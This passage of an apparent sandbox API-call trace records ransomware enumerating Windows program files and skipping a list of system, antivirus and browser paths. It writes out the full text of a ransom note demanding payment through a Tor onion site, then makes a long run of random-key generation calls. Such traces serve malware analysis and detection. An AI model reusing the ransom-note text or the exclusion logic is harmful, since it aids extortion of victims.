dwFlags=0x0) returned 1 [0168.224] FindNextFileW (in: hFindFile=0x9ad478, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0168.224] PathMatchSpecW (pszFile="msadrh15.dll", pszSpec="*NMCRYPT") returned 0 [0168.224] PathMatchSpecW (pszFile="msadrh15.dll", pszSpec="*Recovers your files.html") returned 0 [0168.224] PathMatchSpecW (pszFile="msadrh15.dll", pszSpec="*.exe") returned 0 [0168.224] PathMatchSpecW (pszFile="msadrh15.dll", pszSpec="*.dll") returned 1 [0168.224] FindNextFileW (in: hFindFile=0x9ad478, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 0 [0168.224] GetLastError () returned 0x12 [0168.224] FindClose (in: hFindFile=0x9ad478 | out: hFindFile=0x9ad478) returned 1 [0168.224] _wfopen (_FileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\Recovers your files.html" (normalized: "c:\\program files\\common files\\system\\ado\\recovers your files.html"), _Mode="w") returned 0x77ac1268 [0168.225] fputs (in: _Str=" Encrypted files!

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a

Encrypted files!

All your files are encrypted.Using AES256-bit encryption and RSA-2048-bit encryption.
Making it impossible to recover files without the correct private key.
If you are interested in getting is the key and recover your files
You should proceed with the following steps.

The only way to decrypt your files safely is to buy the Descrypt and Private Key software.

Any attempts to restore your files with the third-party software will be fatal for your files!

Important use Firefox or Chrome browser

To proceed with the purchase you must access one of the link below

If neither of the links is online for a long period of time, there is another way to open it, you should install the Tor Browser

If your personal page is not available for a long period there is another way to open your personal page - installation and use of Tor Browser:

  1. run your Internet browser (if you do not know what it is run the Internet Explorer);
  2. enter or copy the address https://www.torproject.org/download/download-easy.html.en into the address bar of your browser and press ENTER;
  3. wait for the site loading;
  4. on the site you will be offered to download Tor Browser; download and run it, follow the installation instructions, wait until the installation is completed;
  5. run Tor Browser;
  6. connect with the button 'Connect' (if you use the English version);
  7. a normal Internet browser window will be opened after the initialization;
  8. type or copy the address

    https://lylh3uqyzay3lhrd.onion

    in this browser address bar;
  9. press ENTER;
  10. the site should be loaded; if for some reason the site is not loading wait for a moment and try again.
If you have any problems during installation or use of Tor Browser, please, visit https://www.youtube.com and type request in the search bar 'Install Tor Browser Windows' and you will find a lot of training videos about Tor Browser installation and use.

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a
", _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0168.225] fclose (in: _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0168.226] wcslen (_String="Unfortunately crypted files: ") returned 0x1d [0168.226] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0168.226] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0168.226] wcslen (_String="Fortunately ignored files because of filters: ") returned 0x2e [0168.226] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0168.226] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0168.226] wcslen (_String="\\\\?\\") returned 0x4 [0168.226] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\ado\\en-US\\*", pszSpec="*.exe") returned 0 [0168.226] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\ado\\en-US\\*", pszSpec="*.dll") returned 0 [0168.226] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\ado\\en-US\\*", pszSpec="*.lnk") returned 0 [0168.226] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\ado\\en-US\\*", pszSpec="*.bat") returned 0 [0168.226] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\ado\\en-US\\*", pszSpec="*.ini") returned 0 [0168.226] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\ado\\en-US\\*", pszSpec="*.msi") returned 0 [0168.226] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\ado\\en-US\\*", pszSpec="*.scf") returned 0 [0168.226] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\ado\\en-US\\*", pszSpec="*pagefile.sys*") returned 0 [0168.226] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\ado\\en-US\\*", pszSpec="*NTUSER.DAT*") returned 0 [0168.226] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\ado\\en-US\\*", pszSpec="*AppData*") returned 0 [0168.226] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\ado\\en-US\\*", pszSpec="*\\winrar\\*") returned 0 [0168.226] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\ado\\en-US\\*", pszSpec="*\\Internet Explorer\\*") returned 0 [0168.226] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\ado\\en-US\\*", pszSpec="*\\java\\*") returned 0 [0168.226] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\ado\\en-US\\*", pszSpec="*\\TeamViewer\\*") returned 0 [0168.226] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\ado\\en-US\\*", pszSpec="*\\windows\\*") returned 0 [0168.226] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\ado\\en-US\\*", pszSpec="*\\ESET\\*") returned 0 [0168.226] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\ado\\en-US\\*", pszSpec="*\\AVG\\*") returned 0 [0168.226] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\ado\\en-US\\*", pszSpec="*\\AVIRA\\*") returned 0 [0168.226] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\ado\\en-US\\*", pszSpec="*\\AVAST Software\\*") returned 0 [0168.226] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\ado\\en-US\\*", pszSpec="*Atheros*") returned 0 [0168.226] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\ado\\en-US\\*", pszSpec="*Realtek*") returned 0 [0168.226] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\ado\\en-US\\*", pszSpec="*bootmgr*") returned 0 [0168.226] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\ado\\en-US\\*", pszSpec="*boot*") returned 0 [0168.226] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\ado\\en-US\\*", pszSpec="*boot*") returned 0 [0168.226] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\ado\\en-US\\*", pszSpec="*CONFIG.SYS*") returned 0 [0168.226] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\ado\\en-US\\*", pszSpec="*IO.SYS*") returned 0 [0168.226] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\ado\\en-US\\*", pszSpec="*MSDOS.SYS*") returned 0 [0168.226] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\ado\\en-US\\*", pszSpec="*NTDETECT.COM*") returned 0 [0168.226] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\ado\\en-US\\*", pszSpec="*ntldr*") returned 0 [0168.226] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\ado\\en-US\\*", pszSpec="*chrome*") returned 0 [0168.227] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\ado\\en-US\\*", pszSpec="*opera*") returned 0 [0168.227] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\ado\\en-US\\*", pszSpec="*firefox*") returned 0 [0168.227] wcslen (_String="\\\\?\\") returned 0x4 [0168.227] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\en-US\\*", lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 0x9ad438 [0168.227] wcscmp (_String1=".", _String2=".") returned 0 [0168.227] FindNextFileW (in: hFindFile=0x9ad438, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0168.227] wcscmp (_String1="..", _String2=".") returned 1 [0168.227] wcscmp (_String1="..", _String2="..") returned 0 [0168.227] FindNextFileW (in: hFindFile=0x9ad438, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0168.227] PathMatchSpecW (pszFile="msader15.dll.mui", pszSpec="*NMCRYPT") returned 0 [0168.227] PathMatchSpecW (pszFile="msader15.dll.mui", pszSpec="*Recovers your files.html") returned 0 [0168.227] PathMatchSpecW (pszFile="msader15.dll.mui", pszSpec="*.exe") returned 0 [0168.227] PathMatchSpecW (pszFile="msader15.dll.mui", pszSpec="*.dll") returned 0 [0168.227] PathMatchSpecW (pszFile="msader15.dll.mui", pszSpec="*.lnk") returned 0 [0168.227] PathMatchSpecW (pszFile="msader15.dll.mui", pszSpec="*.bat") returned 0 [0168.227] PathMatchSpecW (pszFile="msader15.dll.mui", pszSpec="*.ini") returned 0 [0168.227] PathMatchSpecW (pszFile="msader15.dll.mui", pszSpec="*.msi") returned 0 [0168.227] PathMatchSpecW (pszFile="msader15.dll.mui", pszSpec="*.scf") returned 0 [0168.227] PathMatchSpecW (pszFile="msader15.dll.mui", pszSpec="*pagefile.sys*") returned 0 [0168.227] PathMatchSpecW (pszFile="msader15.dll.mui", pszSpec="*NTUSER.DAT*") returned 0 [0168.227] PathMatchSpecW (pszFile="msader15.dll.mui", pszSpec="*AppData*") returned 0 [0168.227] PathMatchSpecW (pszFile="msader15.dll.mui", pszSpec="*\\winrar\\*") returned 0 [0168.227] PathMatchSpecW (pszFile="msader15.dll.mui", pszSpec="*\\Internet Explorer\\*") returned 0 [0168.227] PathMatchSpecW (pszFile="msader15.dll.mui", pszSpec="*\\java\\*") returned 0 [0168.227] PathMatchSpecW (pszFile="msader15.dll.mui", pszSpec="*\\TeamViewer\\*") returned 0 [0168.227] PathMatchSpecW (pszFile="msader15.dll.mui", pszSpec="*\\windows\\*") returned 0 [0168.227] PathMatchSpecW (pszFile="msader15.dll.mui", pszSpec="*\\ESET\\*") returned 0 [0168.227] PathMatchSpecW (pszFile="msader15.dll.mui", pszSpec="*\\AVG\\*") returned 0 [0168.227] PathMatchSpecW (pszFile="msader15.dll.mui", pszSpec="*\\AVIRA\\*") returned 0 [0168.227] PathMatchSpecW (pszFile="msader15.dll.mui", pszSpec="*\\AVAST Software\\*") returned 0 [0168.227] PathMatchSpecW (pszFile="msader15.dll.mui", pszSpec="*Atheros*") returned 0 [0168.227] PathMatchSpecW (pszFile="msader15.dll.mui", pszSpec="*Realtek*") returned 0 [0168.227] PathMatchSpecW (pszFile="msader15.dll.mui", pszSpec="*bootmgr*") returned 0 [0168.227] PathMatchSpecW (pszFile="msader15.dll.mui", pszSpec="*boot*") returned 0 [0168.227] PathMatchSpecW (pszFile="msader15.dll.mui", pszSpec="*boot*") returned 0 [0168.227] PathMatchSpecW (pszFile="msader15.dll.mui", pszSpec="*CONFIG.SYS*") returned 0 [0168.227] PathMatchSpecW (pszFile="msader15.dll.mui", pszSpec="*IO.SYS*") returned 0 [0168.227] PathMatchSpecW (pszFile="msader15.dll.mui", pszSpec="*MSDOS.SYS*") returned 0 [0168.227] PathMatchSpecW (pszFile="msader15.dll.mui", pszSpec="*NTDETECT.COM*") returned 0 [0168.227] PathMatchSpecW (pszFile="msader15.dll.mui", pszSpec="*ntldr*") returned 0 [0168.227] PathMatchSpecW (pszFile="msader15.dll.mui", pszSpec="*chrome*") returned 0 [0168.227] PathMatchSpecW (pszFile="msader15.dll.mui", pszSpec="*opera*") returned 0 [0168.227] PathMatchSpecW (pszFile="msader15.dll.mui", pszSpec="*firefox*") returned 0 [0168.228] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\ado\\en-US\\msader15.dll.mui", pszSpec="*") returned 1 [0168.228] strlen (_Str="NMoreira") returned 0x8 [0168.228] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.228] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.228] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.228] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.228] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.228] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.228] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.228] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.228] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.228] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.228] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.228] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.228] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.228] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.228] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.228] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.228] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.228] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.228] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.228] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.228] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.228] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.228] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.228] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.228] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.228] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.228] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.228] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.228] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.228] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.228] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.228] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.228] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.228] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.228] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.228] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.228] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.228] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.228] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.228] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.228] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.228] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.228] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.228] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.228] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.228] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.228] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.228] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.228] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 